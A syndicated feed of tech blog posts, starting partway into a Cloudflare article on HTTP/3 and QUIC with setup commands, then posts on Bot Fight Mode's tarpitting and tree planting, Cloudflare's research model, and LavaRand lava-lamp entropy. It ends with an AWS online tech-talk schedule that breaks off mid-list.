It all started back in 1996 with the publication of the HTTP/1.0 specification, which defined the basic HTTP textual wire format as we know it today (for the purposes of this post I’m pretending HTTP/0.9 never existed). In HTTP/1.0 a new TCP connection is created for each request/response exchange between clients and servers, meaning that all requests incur a latency penalty as the TCP and TLS handshakes are completed before each request.

Worse still, rather than sending all outstanding data as fast as possible once the connection is established, TCP enforces a warm-up period called “slow start”, which allows the TCP congestion control algorithm to determine the amount of data that can be in flight at any given moment before congestion on the network path occurs, and avoid flooding the network with packets it can’t handle. But because new connections have to go through the slow start process, they can’t use all of the network bandwidth available immediately.

The HTTP/1.1 revision of the HTTP specification tried to solve these problems a few years later by introducing the concept of “keep-alive” connections, that allow clients to reuse TCP connections, and thus amortize the cost of the initial connection establishment and slow start across multiple requests. But this was no silver bullet: while multiple requests could share the same connection, they still had to be serialized one after the other, so a client and server could only execute a single request/response exchange at any given time for each connection.

As the web evolved, browsers found themselves needing more and more concurrency when fetching and rendering web pages as the number of resources (CSS, JavaScript, images, …) required by each web site increased over the years. But since HTTP/1.1 only allowed clients to do one HTTP request/response exchange at a time, the only way to gain concurrency at the network layer was to use multiple TCP connections to the same origin in parallel, thus losing most of the benefits of keep-alive connections. While connections would still be reused to a certain (but lesser) extent, we were back at square one.

Finally, more than a decade later, came SPDY and then HTTP/2, which, among other things, introduced the concept of HTTP “streams”: an abstraction that allows HTTP implementations to concurrently multiplex different HTTP exchanges onto the same TCP connection, allowing browsers to more efficiently reuse TCP connections.

But, yet again, this was no silver bullet! HTTP/2 solves the original problem — inefficient use of a single TCP connection — since multiple requests/responses can now be transmitted over the same connection at the same time. However, all requests and responses are equally affected by packet loss (e.g. due to network congestion), even if the data that is lost only concerns a single request. This is because while the HTTP/2 layer can segregate different HTTP exchanges on separate streams, TCP has no knowledge of this abstraction, and all it sees is a stream of bytes with no particular meaning.

The role of TCP is to deliver the entire stream of bytes, in the correct order, from one endpoint to the other. When a TCP packet carrying some of those bytes is lost on the network path, it creates a gap in the stream and TCP needs to fill it by resending the affected packet when the loss is detected. While doing so, none of the successfully delivered bytes that follow the lost ones can be delivered to the application, even if they were not themselves lost and belong to a completely independent HTTP request. So they end up getting unnecessarily delayed as TCP cannot know whether the application would be able to process them without the missing bits. This problem is known as “head-of-line blocking”.

Enter HTTP/3

This is where HTTP/3 comes into play: instead of using TCP as the transport layer for the session, it uses QUIC, a new Internet transport protocol, which, among other things, introduces streams as first-class citizens at the transport layer. QUIC streams share the same QUIC connection, so no additional handshakes and slow starts are required to create new ones, but QUIC streams are delivered independently such that in most cases packet loss affecting one stream doesn’t affect others. This is possible because QUIC packets are encapsulated on top of UDP datagrams.

Using UDP allows much more flexibility compared to TCP, and enables QUIC implementations to live fully in user-space — updates to the protocol’s implementations are not tied to operating systems updates as is the case with TCP. With QUIC, HTTP-level streams can be simply mapped on top of QUIC streams to get all the benefits of HTTP/2 without the head-of-line blocking.

QUIC also combines the typical 3-way TCP handshake with TLS 1.3’s handshake. Combining these steps means that encryption and authentication are provided by default, and also enables faster connection establishment. In other words, even when a new QUIC connection is required for the initial request in an HTTP session, the latency incurred before data starts flowing is lower than that of TCP with TLS.

But why not just use HTTP/2 on top of QUIC, instead of creating a whole new HTTP revision? After all, HTTP/2 also offers the stream multiplexing feature. As it turns out, it’s somewhat more complicated than that.

While it’s true that some of the HTTP/2 features can be mapped on top of QUIC very easily, that’s not true for all of them. One in particular, HTTP/2’s header compression scheme called HPACK, heavily depends on the order in which different HTTP requests and responses are delivered to the endpoints. QUIC enforces delivery order of bytes within single streams, but does not guarantee ordering among different streams.

This behavior required the creation of a new HTTP header compression scheme, called QPACK, which fixes the problem but requires changes to the HTTP mapping. In addition, some of the features offered by HTTP/2 (like per-stream flow control) are already offered by QUIC itself, so they were dropped from HTTP/3 in order to remove unnecessary complexity from the protocol.

HTTP/3, powered by a delicious quiche

QUIC and HTTP/3 are very exciting standards, promising to address many of the shortcomings of previous standards and ushering in a new era of performance on the web. So how do we go from exciting standards documents to working implementation?

Cloudflare’s QUIC and HTTP/3 support is powered by quiche, our own open-source implementation written in Rust.

You can find it on GitHub at github.com/cloudflare/quiche.

We announced quiche a few months ago and since then have added support for the HTTP/3 protocol, on top of the existing QUIC support. We have designed quiche in such a way that it can now be used to implement HTTP/3 clients and servers or just plain QUIC ones.

How do I enable HTTP/3 for my domain?

As mentioned above, we have started onboarding customers that signed up for the waiting list. If you are on the waiting list and have received an email from us communicating that you can now enable the feature for your websites, you can simply go to the Cloudflare dashboard and flip the switch from the “Network” tab manually:

HTTP/3: the past, the present, and the future

We expect to make the HTTP/3 feature available to all customers in the near future.

Once enabled, you can experiment with HTTP/3 in a number of ways:

Using Google Chrome as an HTTP/3 client

In order to use the Chrome browser to connect to your website over HTTP/3, you first need to download and install the latest Canary build. Then all you need to do to enable HTTP/3 support is start Chrome Canary with the “--enable-quic” and “--quic-version=h3-23” command-line arguments.

Once Chrome is started with the required arguments, you can just type your domain in the address bar and see it loaded over HTTP/3 (you can use the Network tab in Chrome’s Developer Tools to check which protocol version was used). Note that because HTTP/3 is negotiated between the browser and the server via the Alt-Svc response header (visible in the curl output later in this post), it might not be used for the first few connections to the domain, so you should try reloading the page a few times.

If this seems too complicated, don’t worry: as the HTTP/3 support in Chrome becomes more stable over time, enabling it will become easier.

This is what the Network tab in the Developer Tools shows when browsing this very blog over HTTP/3:

HTTP/3: the past, the present, and the future

Note that due to the experimental nature of the HTTP/3 support in Chrome, the protocol is actually identified as “http2+quic/99” in Developer Tools, but don’t let that fool you, it is indeed HTTP/3.

Using curl

The curl command-line tool also supports HTTP/3 as an experimental feature. You’ll need to download the latest version from git and follow the instructions on how to enable HTTP/3 support.

If you’re running macOS, we’ve also made it easy to install an HTTP/3 equipped version of curl via Homebrew:

 % brew install --HEAD -s https://raw.githubusercontent.com/cloudflare/homebrew-cloudflare/master/curl.rb

In order to perform an HTTP/3 request, all you need is to add the “--http3” command-line flag to a normal curl command:

 % ./curl -I https://blog.cloudflare.com/ --http3
HTTP/3 200
date: Tue, 17 Sep 2019 12:27:07 GMT
content-type: text/html; charset=utf-8
set-cookie: __cfduid=d3fc7b95edd40bc69c7d894d296564df31568723227; expires=Wed, 16-Sep-20 12:27:07 GMT; path=/; domain=.blog.cloudflare.com; HttpOnly; Secure
x-powered-by: Express
cache-control: public, max-age=60
vary: Accept-Encoding
cf-cache-status: HIT
age: 57
expires: Tue, 17 Sep 2019 12:28:07 GMT
alt-svc: h3-22=":443"; ma=86400
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
server: cloudflare
cf-ray: 517b128df871bfe3-MAN

Using quiche’s http3-client

Finally, we also provide an example HTTP/3 command-line client (as well as a command-line server) built on top of quiche, that you can use to experiment with HTTP/3.

To get it running, first clone quiche’s GitHub repository:

$ git clone --recursive https://github.com/cloudflare/quiche

Then build it. You need a working Rust and Cargo installation for this to work (we recommend using rustup to easily set up a working Rust development environment).

$ cargo build --examples

And finally you can execute an HTTP/3 request:

$ RUST_LOG=info target/debug/examples/http3-client https://blog.cloudflare.com/

What’s next?

In the coming months we’ll be working on improving and optimizing our QUIC and HTTP/3 implementation, and will eventually allow everyone to enable this new feature without having to go through a waiting list. We’ll continue updating our implementation as standards evolve, which may result in breaking changes between draft versions of the standards.

Here are a few new features on our roadmap that we’re particularly excited about:

Connection migration

One important feature that QUIC enables is seamless and transparent migration of connections between different networks (such as your home WiFi network and your carrier’s mobile network as you leave for work in the morning) without requiring a whole new connection to be created.

This feature will require some additional changes to our infrastructure, but it’s something we are excited to offer our customers in the future.

Zero Round Trip Time Resumption

Just like TLS 1.3, QUIC supports a mode of operation that allows clients to start sending HTTP requests before the connection handshake has completed. We don’t yet support this feature in our QUIC deployment, but we’ll be working on making it available, just like we already do for our TLS 1.3 support.

HTTP/3: it’s alive!

We are excited to support HTTP/3 and allow our customers to experiment with it while efforts to standardize QUIC and HTTP/3 are still ongoing. We’ll continue working alongside other organizations, including Google and Mozilla, to finalize the QUIC and HTTP/3 standards and encourage broad adoption.

Here’s to a faster, more reliable, more secure web experience for all.

Cleaning up bad bots (and the climate)

Post Syndicated from John Graham-Cumming original https://blog.cloudflare.com/cleaning-up-bad-bots/

Cleaning up bad bots (and the climate)

From the very beginning Cloudflare has been stopping malicious bots from scraping websites, or misusing APIs. Over time we’ve improved our bot detection methods and deployed large machine learning models that are able to distinguish real traffic (be it from humans or apps) from malicious bots. We’ve also built a large catalog of good bots to detect things like helpful indexing by search engines.

But it’s not enough. Malicious bots continue to be a problem on the Internet and we’ve decided to fight back. From today customers have the option of enabling “bot fight mode” in their Cloudflare Dashboard.

Once enabled, when we detect a bad bot, we will do three things: (1) we’re going to disincentivize the bot maker economically by tarpitting them, including requiring them to solve a computationally intensive challenge that will require more of their bot’s CPU; (2) for Bandwidth Alliance partners, we’re going to hand the IP of the bot to the partner and get the bot kicked offline; and (3) we’re going to plant trees to make up for the bot’s carbon cost.

Malicious bots harm legitimate web publishers and applications, hurt hosting providers by misusing resources, and doubly hurt the planet through the cost of electricity and cooling for the servers that run the bots and for the servers of their victims.

Enough is enough. Our goal is nothing short of making it no longer viable to run a malicious bot on the Internet. And we think, with our scale, we can do exactly that.

How Cloudflare Detects Bots

Cloudflare’s secret sauce (ok, not very secret sauce) is our vast scale.  We currently handle traffic for over 20 million Internet properties ranging from the smallest personal web sites, through backend APIs for popular apps and IoT devices, to some of the best known names on the Internet (including 10% of the Fortune 1000).

This scale gives us a huge advantage in that we see an enormous amount and variety of traffic allowing us to build large machine learning models of Internet behavior. That scale and variety allows us to test new rules and models quickly and easily.

Our bot detection breaks down into four large components:

  • Identification of well known legitimate bots;
  • Hand written rules for simple bots that, however simple, get used day in, day out;
  • Our Bot Activity Detector model that spots the behavior of bots based on past traffic and blocks them; and
  • Our Trusted Client model that spots whether an HTTP User-Agent is what it says it is.

In addition, Gatebot, our DDoS mitigation system, fingerprints DDoS bots and blocks their traffic at the packet level. Beyond Gatebot, customers also have access to our Firewall Rules where they can write granular rules to block very specific attack types.

Another model allows us to determine whether an IP address belongs to a VPN endpoint, a home broadband subscriber, a company using NAT or a hosting or cloud provider. It’s this last group that “Bot Cleanup” targets.

Today, Cloudflare challenges over 3 billion bot requests per day. Some of those bots are about to have a really bad time.

How Cloudflare Fights Bots

The cost of launching a bot attack consists of the expense of CPU time that powers the attack. If our models show that the traffic is coming from a bot, and it’s on a hosting or a cloud provider, we’ll deploy CPU intensive code to make the bot writer expend more CPU and slow them down. By forcing the attacker to use more CPU, we increase their costs during an attack and deter future ones.
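Cloudflare hasn’t published the details of the challenge it serves to bots, so the following Go sketch is only an illustration of the economics of a CPU-intensive challenge: a proof-of-work-style puzzle that is expensive for the client to solve but nearly free for the server to verify.

package main

import (
    "crypto/sha256"
    "encoding/binary"
    "fmt"
    "strings"
)

// solve burns client CPU searching for a nonce such that
// SHA-256(challenge || nonce) starts with `difficulty` zero hex digits.
func solve(challenge string, difficulty int) uint64 {
    prefix := strings.Repeat("0", difficulty)
    buf := make([]byte, 8)
    for nonce := uint64(0); ; nonce++ {
        binary.BigEndian.PutUint64(buf, nonce)
        sum := sha256.Sum256(append([]byte(challenge), buf...))
        if strings.HasPrefix(fmt.Sprintf("%x", sum), prefix) {
            return nonce
        }
    }
}

// verify costs the server a single hash, so the work is asymmetric:
// expensive for the bot, nearly free for the defender.
func verify(challenge string, difficulty int, nonce uint64) bool {
    buf := make([]byte, 8)
    binary.BigEndian.PutUint64(buf, nonce)
    sum := sha256.Sum256(append([]byte(challenge), buf...))
    return strings.HasPrefix(fmt.Sprintf("%x", sum), strings.Repeat("0", difficulty))
}

func main() {
    const difficulty = 5 // ~16^5 hashes on average to solve
    nonce := solve("per-request-challenge", difficulty)
    fmt.Println("nonce:", nonce, "valid:", verify("per-request-challenge", difficulty, nonce))
}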

This is one of the many so-called “tarpitting” techniques we’re now deploying across our network to change the economics of running a malicious bot. Malicious bot operators be warned: if you target resources behind Cloudflare’s IP space, we’re going to make you spin your wheels.

Every minute we tie malicious bots up is a minute they’re not harming the Internet as a whole. This means we aren’t just protecting our customers but everyone online currently terrorized by malicious bots. The spirit of Cloudflare’s Birthday Week has always been about giving back to the Internet as a whole, and we can think of no better gift than ridding the Internet of malicious bots.

Beyond just wasting bots’ time, we also want to get them shut down. If the infrastructure provider hosting the bot is part of the Bandwidth Alliance, we’ll share the bot’s IP address so they can shut down the bot completely. The Bandwidth Alliance allows us to reduce transit costs with partners and, with this launch, also helps us work together with them to make the Internet safer for legitimate users.

Generally, everyone we ran Bot Fight Mode by thought it was a great idea. The only objection we heard was that as we start forcing bots to solve CPU intensive challenges in the short term, before they just give up — which we think is inevitable in the long term — we may raise carbon emissions. To combat those emissions we’re committed to estimating the extra CPU utilized by these bots, calculating their carbon cost, and then planting trees to compensate and build a better future.

Planting Trees

Dealing with climate change requires multiple efforts by people and companies. Cloudflare announced earlier this year that we had expanded our purchasing of Renewable Energy Certificates (that previously covered our North American operations) to our entire global network of 194 cities.

To figure out how much tree planting we need to do we need to calculate the cost of the extra CPU used when making a bot work hard. Here’s how that will work.

Using a figure of 450 kg CO2/year (from https://www.goclimateneutral.org/blog/the-carbon-footprint-of-servers/) for the type of server that a bad bot might use (a cloud server using a non-renewable energy source), we get about 8 kg CO2/year per CPU core. We are able to measure the time bots spend burning CPU, so we can directly estimate the amount of CO2 emitted by our fight back.

According to One Tree Planted, a single mature tree can absorb about 21kg CO2/year. So, very roughly, each tree can absorb a year’s worth of CO2 from 2.5 CPU cores.

Since trees take time to mature, and given the scale of the climate change challenge, we’re going to pay to overplant trees. For every tree that we calculate we’d need to plant to sequester the CO2 emissions from fighting bots, we’re going to donate $25 to One Tree Planted to plant 25 trees. The sketch below shows how the numbers in this section fit together.
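As a back-of-the-envelope illustration only (this mirrors the figures quoted above, not Cloudflare’s actual accounting code), here is how measured bot CPU time could be converted into trees:

package main

import (
    "fmt"
    "time"
)

const (
    kgCO2PerCoreYear = 8.0  // derived above from ~450 kg CO2/year per cloud server
    kgCO2PerTreeYear = 21.0 // absorption of one mature tree (One Tree Planted)
    overplantFactor  = 25.0 // $25 plants 25 trees for every tree needed
)

// treesFor converts measured bot CPU time into the number of trees
// needed to absorb the resulting CO2, and the number actually planted.
func treesFor(botCPU time.Duration) (needed, planted float64) {
    coreYears := botCPU.Hours() / (24 * 365)
    needed = coreYears * kgCO2PerCoreYear / kgCO2PerTreeYear
    return needed, needed * overplantFactor
}

func main() {
    // Example: 10,000 core-hours of bot CPU burned in tarpits.
    needed, planted := treesFor(10000 * time.Hour)
    fmt.Printf("trees needed: %.2f, trees planted: %.0f\n", needed, planted)
}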

And, of course, we’ll be handing the IPs of bad bots to our Bandwidth Alliance partners to get the bots shut down and remove their carbon cost completely. In the past, the tech community has largely defeated email spammers and DDoS-for-hire services by making their efforts fruitless; we think this is the right strategy to now defeat malicious bots once and for all.

Who Do Bots Hurt?

Malicious bots can cause significant harm to our customers’ infrastructure and often result in bad experiences for our customers’ users.

For example, a recent customer was being crippled by a credential stuffing attack that was not only attempting to compromise their users’ accounts but was doing so at such volume that it effectively caused a small-scale denial of service across the customer’s website.

The malicious bot was overloading the customer’s conventional threat prevention infrastructure and we rapidly onboarded them as an Under Attack customer. As a part of the onboarding, we identified that the attack could be specifically thwarted using our Bot Management product while not impacting any legitimate user traffic.

Another trend we have seen is the increasing combination of bots with botnets, particularly in the world of inventory hoarding bots. The motivation and willingness to spend of these bot operators is quite high.

The targets are generally goods in limited supply, high in demand, and high in value. Think sneakers, concert tickets, airline seats, and popular short-run Broadway musicals. Bot operators who are able to purchase those items at retail can charge massive premiums in aftermarket sales. When the operator identifies a target site, such as an ecommerce retailer, and a specific item, such as a new pair of sneakers going on sale, they can purchase time on the new Residential Proxy as a Service market to gain access to end-user machines and (relatively) clean IPs from which to launch their attack.

They then utilize sophisticated techniques and triggers to change the characteristics of the machine, network, and software they use to generate the attack across a very wide array of options and combinations, thwarting systems that rely on repetition or known patterns. This type of attack hurts multiple targets: the ecommerce site is left with real, frustrated users who can’t purchase the in-demand item; those real users lose out on inventory to an attacker who is just there to skim off the largest profit possible; and the unwitting users who are part of the botnet have their resources, such as their home broadband connection, used without their consent or knowledge.

The bottom line is that bots hurt companies and their customers.

Summary

Cloudflare has fought malicious bots from the very beginning, and over time has deployed more and more sophisticated methods to block them. Using the power of the over 20 million Internet properties we protect and accelerate, and our visibility into networks and users around the world, we have built machine learning models that separate the bots from the good traffic and block the bad ones.

But bots continue to be a problem, and our new Bot Fight Mode will directly disincentivize bot writers from attacking our customers. At the same time, we don’t want to contribute to climate change, so we are offsetting the carbon cost of bots by planting trees to absorb carbon and help build a better future (and Internet).

Cloudflare’s Approach to Research

Post Syndicated from Nick Sullivan original https://blog.cloudflare.com/cloudflares-approach-to-research/

Cloudflare’s mission is to help build a better Internet. One of the tools used in pursuit of this goal is computer science research. We’ve learned that some of the difficult problems to solve are best approached through research and experimentation to understand the solution before engineering it at scale. This research-focused approach to solving the big problems of the Internet is exemplified by the work of the Cryptography Research team, which leverages research to help build a safer, more secure and more performant Internet. Over the years, the team has worked on more than just cryptography, so we’re taking the model we’ve developed and expanding the scope of the team to include more areas of computer science research. Cryptography Research at Cloudflare is now Cloudflare Research. I am excited to share some of the insights we’ve learned over the years in this blog post.

Cloudflare’s research model

  • Team structure – Hybrid approach. We have a program that allows research engineers to be embedded into product and operations teams for temporary assignments. This gives people direct exposure to practical problems.
  • Problem philosophy – Impact-focused. We use our expertise and the expertise of partners in industry and academia to select projects that have the potential to make a big impact, and for which existing solutions are insufficient or not yet popularized.
  • Promoting solutions – Open collaboration. Popularizing winning ideas through public outreach, working with industry partners to promote standardization, and implementing ideas at scale to show they’re effective.

The hybrid approach to research

“Super-ambitious goals tend to be unifying and energizing to people; but only if they believe there’s a chance of success.” – Peter Diamandis

Given the scale and reach of Cloudflare, research problems (and opportunities) present themselves all the time. Our approach to research is a practical one. We choose to tackle projects that have the potential to make a big impact, and for which existing solutions are insufficient. This stems from a belief that the interconnected systems that make up the Internet can be changed and improved in a fundamental way. While some research problems are solvable in a few months, some may take years. We don’t shy away from long-term projects, but the Internet moves fast, so it’s important to break down long-term projects into smaller, independently-valuable pieces in order to continually provide value while pursuing a bigger vision.

Successful technological innovation is not purely about technical accomplishments. New creations need the social and political scaffolding to support them while being built, and the momentum and support to gain popularity. We are better able to innovate if grounded in a deep understanding of the current day-to-day. To stay grounded, our research team members spend part of their time solving practical problems that affect Cloudflare and our customers right now.

Cloudflare employs a hybrid research model similar to the model pioneered by Google. Innovation can come from everywhere in a company, so teams are encouraged to find the right balance between research and engineering activities. The research team works with the same tools, systems, and constraints as the rest of the engineering organization.

Research engineers are expected to write production-quality code and contribute to engineering activities. This enables researchers to leverage the rich data provided by Cloudflare’s production environment for experiments. To further break down silos, we have a program that allows research engineers to be embedded into product and operations teams for temporary assignments. This gives people direct exposure to practical problems.

Continuing a successful tradition (our tradition)

“Skate to where the puck is going, not where it has been.” – Wayne Gretzky

The output of the research team is both new knowledge and technology that can lead to innovative products. Research works hand-in-hand with both product and engineering to help drive long-term positive outcomes for both Cloudflare and the Internet at large.

An example of a long-term project that requires both research and engineering is helping the Internet migrate from insecure to secure network protocols. To tackle the problem, we pursued several smaller projects with discrete and measurable outcomes, along with many other smaller efforts. Each step along the way contributed something concrete to help make the Internet more secure.

This year’s Crypto Week is a great example of the type of impact an effective hybrid research organization can make. Every day that week, a new announcement was made that helped take research results and realize their practical impact. From the League of Entropy, which is based on fundamental work by researchers at EPFL, to Cloudflare Time Services, which helps address time security issues raised in papers by former Cloudflare intern Aanchal Malhotra, to our own (currently running) post-quantum experiment with Google Chrome, engineers at Cloudflare combined research with building large-scale production systems to help solve some unsolved problems on the Internet.

Open collaboration, open standards, and open source

“We reject kings, presidents and voting. We believe in rough consensus and running code.” – Dave Clark

Effective research requires:

  • Choosing interesting problems to solve
  • Popularizing the ideas discovered while studying the solution space
  • Implementing the ideas at scale to show they’re effective

Cloudflare’s massive popularity puts us in a very privileged position. We can research, implement and deploy experiments at a scale that simply can’t be done by most organizations. This makes Cloudflare an attractive research partner for universities and other research institutions who have domain knowledge but not data. We rely on our own expertise along with that of peers in both academia and industry to decide which problems to tackle in order to achieve common goals and make new scientific progress. Our middlebox detection project, proposed by researchers at the University of Michigan, is an example of such a problem.

We’re not purists who are only interested in pursuing our own ideas. Some interesting problems have already been solved, but the solution isn’t widely known or implemented. In this situation, we contribute our efforts to help elevate the best ideas and make them available to the public in an accessible way. Our early work popularizing elliptic curves on the Internet is such an example.

Popularizing an idea and implementing the idea at scale are two different things. Along with popularizing winning ideas, we want to ensure these ideas stick and provide benefits to Internet users. To promote the widespread deployment of useful ideas, we work on standards and deploy newly emerging standards early on. Doing so helps the industry easily adopt innovations and supports interoperability. For example, the work done for Crypto Week 2019 has helped the development of international technical standards. Aspects of the League of Entropy are now being standardized at the CFRG, Roughtime is now being considered for adoption as an IETF standard, and we are presenting our post-quantum results as part of NIST’s post-quantum cryptography standardization effort.

Open source software is another key aspect of scaling the implementation of an idea. We open source associated code whenever possible. The research team collaborates with the wider research world as well as internally with other teams at Cloudflare.

Focus areas going forward

Doing research, sharing it in an accessible way, working with top experts to validate it, and working on standardization has several benefits. It provides an opportunity to educate the public, further scientific understanding, and improve the state of the art; but it’s also a great way to attract candidates. Great engineers want to work on interesting projects and great researchers want to see their work have an impact. This hybrid research approach is attractive to both types of candidates.

Computer science is a vast arena, so the areas we’re currently focusing on are:

  • Security and privacy
  • Cryptography
  • Internet measurement
  • Low-level networking and operating systems
  • Emerging networking paradigms

Here are some highlights of publications we’ve co-authored over the last few years in these areas. We’ll be building on this tradition going forward.

And by the way, we’re hiring!

Product Management
Help the research team explore the future of peer-to-peer systems by building and managing projects like the Distributed Web Gateway.

Engineering
Engineering Manager (San Francisco, London)
Systems Engineer – Cryptography Research (San Francisco)
Cryptography Research Engineer Internship (San Francisco, London)

If none of these fit you perfectly, but you still want to reach out, send us an email at: [email protected].

How Cloudflare and Wall Street Are Helping Encrypt the Internet Today

Post Syndicated from Nick Sullivan original https://blog.cloudflare.com/how-cloudflare-and-wall-street-are-helping-encrypt-the-internet-today/

Today has been a big day for Cloudflare, as we became a public company on the New York Stock Exchange (NYSE: NET). To mark the occasion, we decided to bring our favorite entropy machines to the floor of the NYSE. Footage of these lava lamps is being used as an additional seed to our entropy-generation system LavaRand — bolstering Internet encryption for over 20 million Internet properties worldwide.

(This is mostly for fun. But when’s the last time you saw a lava lamp on the trading floor of the New York Stock Exchange?)

A little context: generating truly random numbers using computers is impossible, because code is inherently deterministic (i.e. predictable). To compensate for this, engineers draw from pools of randomness created by entropy generators, which is a fancy term for “things that are truly unpredictable”.

It turns out that lava lamps are fantastic sources of entropy, as was first shown by Silicon Graphics in the 1990s. It’s a torch we’ve been proud to carry forward: today, Cloudflare uses lava lamps to generate entropy that helps make millions of Internet properties more secure.

Housed in our San Francisco headquarters is a wall filled with dozens of lava lamps, undulating with mesmerizing randomness. We capture these lava lamps on video via a camera mounted across the room, and feed the resulting footage into an algorithm — called LavaRand — that amplifies the pure randomness of these lava lamps to dizzying extremes (computers can’t create seeds of pure randomness, but they can massively amplify them).
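
Conceptually, the pipeline condenses unpredictable camera input into a seed and mixes it with other entropy sources. Here is a minimal sketch of that idea, with a stand-in for the real frame source (the actual LavaRand pipeline is more involved):

import { createHash, createHmac, randomBytes } from "crypto";

// Toy LavaRand-style seeding (illustrative only). A video frame of the
// lamp wall is an unpredictable byte buffer; hashing it condenses that
// physical entropy into a fixed-size seed.

function seedFromFrame(frameBytes: Buffer): Buffer {
  // SHA-256 acts as a randomness extractor over the raw frame data.
  return createHash("sha256").update(frameBytes).digest();
}

function mixSeeds(lavaSeed: Buffer, systemSeed: Buffer): Buffer {
  // HMAC combines two sources so the output stays unpredictable
  // as long as at least one input is.
  return createHmac("sha256", systemSeed).update(lavaSeed).digest();
}

const frame = randomBytes(1920 * 1080 * 3); // stand-in for a real camera frame
const seed = mixSeeds(seedFromFrame(frame), randomBytes(32));
console.log(seed.toString("hex")); // feed this into a CSPRNG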

Shortly before we rang the opening bell this morning, we recorded footage of our lava lamps in operation on the trading room floor of the New York Stock Exchange, and we’re ingesting the footage into our LavaRand system. The resulting entropy is mixed with the myriad additional sources of entropy that we leverage every day, creating a cryptographically-secure source of randomness — fortified by Wall Street.

We recently took our enthusiasm for randomness a step further by facilitating the League of Entropy, a consortium of global organizations and individual contributors, generating verifiable randomness via a globally distributed network. As one of the founding members of the League, LavaRand plays a key role in empowering developers worldwide with a pool of randomness with extreme entropy and high reliability.

And today, she’s enjoying the view from the podium!


One caveat: the lava lamps we run in our San Francisco headquarters are recorded in real-time, 24/7, giving us an ongoing stream of entropy. For reasons that are understandable, the NYSE doesn’t allow for live video feeds from the exchange floor while it is in operation. But this morning they did let us record footage of the lava lamps operating shortly before the opening bell. The video was recorded and we’re ingesting it into our LavaRand system (alongside many other entropy generators, including the lava lamps back in San Francisco).

Learn about AWS Services & Solutions – September AWS Online Tech Talks

Post Syndicated from Jenny Hang original https://aws.amazon.com/blogs/aws/learn-about-aws-services-solutions-september-aws-online-tech-talks/

Learn about AWS Services & Solutions – September AWS Online Tech Talks

AWS Tech Talks

Join us this September to learn about AWS services and solutions. The AWS Online Tech Talks are live, online presentations that cover a broad range of topics at varying technical levels. These tech talks, led by AWS solutions architects and engineers, feature technical deep dives, live demonstrations, customer examples, and Q&A with AWS experts. Register Now!

Note – All sessions are free and in Pacific Time.

Tech talks this month:

Compute:

September 23, 2019 | 11:00 AM – 12:00 PM PT – Build Your Hybrid Cloud Architecture with AWS – Learn about the extensive range of services AWS offers to help you build a hybrid cloud architecture best suited for your use case.

September 26, 2019 | 1:00 PM – 2:00 PM PT – Self-Hosted WordPress: It’s Easier Than You Think – Learn how you can easily build a fault-tolerant WordPress site using Amazon Lightsail.

October 3, 2019 | 11:00 AM – 12:00 PM PT – Lower Costs by Right Sizing Your Instance with Amazon EC2 T3 General Purpose Burstable Instances – Get an overview of T3 instances, understand what workloads are ideal for them, and understand how the T3 credit system works so that you can lower your EC2 instance costs today.

Containers:

September 26, 2019 | 11:00 AM – 12:00 PM PT – Develop a Web App Using Amazon ECS and AWS Cloud Development Kit (CDK) – Learn how to build your first app using CDK and AWS container services.

Data Lakes & Analytics:

September 26, 2019 | 9:00 AM – 10:00 AM PT – Best Practices for Provisioning Amazon MSK Clusters and Using Popular Apache Kafka-Compatible Tooling – Learn best practices on running Apache Kafka production workloads at a lower cost on Amazon MSK.

Databases:

September 25, 2019 | 1:00 PM – 2:00 PM PT – What’s New in Amazon DocumentDB (with MongoDB compatibility) – Learn what’s new in Amazon DocumentDB, a fully managed MongoDB compatible database service designed from the ground up to be fast, scalable, and highly available.

October 3, 2019 | 9:00 AM – 10:00 AM PT – Best Practices for Enterprise-Class Security, High-Availability, and Scalability with Amazon ElastiCache – Learn about new enterprise-friendly Amazon ElastiCache enhancements like customer managed key and online scaling up or down to make your critical workloads more secure, scalable and available.

DevOps:

October 1, 2019 | 9:00 AM – 10:00 AM PT – CI/CD for Containers: A Way Forward for Your DevOps Pipeline – Learn how to build CI/CD pipelines using AWS services to get the most out of the agility afforded by containers.

Enterprise & Hybrid:

September 24, 2019 | 1:00 PM – 2:30 PM PT – Virtual Workshop: How to Monitor and Manage Your AWS Costs – Learn how to visualize and manage your AWS cost and usage in this virtual hands-on workshop.

October 2, 2019 | 1:00 PM – 2:00 PM PT – Accelerate Cloud Adoption and Reduce Operational Risk with AWS Managed Services – Learn how AMS accelerates your migration to AWS, reduces your operating costs, improves security and compliance, and enables you to focus on your differentiating business priorities.

IoT:

September 25, 2019 | 9:00 AM – 10:00 AM PT – Complex Monitoring for Industrial with AWS IoT Data Services – Learn how to solve your complex event monitoring challenges with AWS IoT Data Services.

Machine Learning:

September 23, 2019 | 9:00 AM – 10:00 AM PT – Training Machine Learning Models Faster – Learn how to train machine learning models quickly and with a single click using Amazon SageMaker.

September 30, 2019 | 11:00 AM – 12:00 PM PT – Using Containers for Deep Learning Workflows – Learn how containers can help address challenges in deploying deep learning environments.

October 3, 2019 | 1:00 PM – 2:30 PM PT – Virtual Workshop: Getting Hands-On with Machine Learning and Ready to Race in the AWS DeepRacer League – Join DeClercq Wentzel, Senior Product Manager for AWS DeepRacer, for a presentation on the basics of machine learning and how to build a reinforcement learning model that you can use to join the AWS DeepRacer League.

AWS Marketplace:

September 30, 2019 | 9:00 AM – 10:00 AM PT – Advancing Software Procurement in a Containerized World – Learn how to deploy applications faster with third-party container products.

Migration:

September 24, 2019 | 11:00 AM – 12:00 PM PT – Application Migrations Using AWS Server Migration Service (SMS) – Learn how to use AWS Server Migration Service (SMS) for automating application migration and scheduling continuous replication, from your on-premises data centers or Microsoft Azure to AWS.

Networking & Content Delivery:

September 25, 2019 | 11:00 AM – 12:00 PM PT – Building Highly Available and Performant Applications using AWS Global Accelerator – Learn how to build highly available and performant architectures for your applications with AWS Global Accelerator, now with source IP preservation.

September 30, 2019 | 1:00 PM – 2:00 PM PT – AWS Office Hours: Amazon CloudFront – Just getting started with Amazon CloudFront and Lambda@Edge? Get answers directly from our experts during AWS Office Hours.

Robotics:

October 1, 2019 | 11:00 AM – 12:00 PM PT – Robots and STEM: AWS RoboMaker and AWS Educate Unite! – Come join members of the AWS RoboMaker and AWS Educate teams as we provide an overview of our education initiatives and walk you through the newly launched RoboMaker Badge.

Security, Identity & Compliance:

October 1, 2019 | 1:00 PM – 2:00 PM PT – Deep Dive on Running Active Directory on AWS – Learn how to deploy Active Directory on AWS and start migrating your Windows workloads.

Serverless:

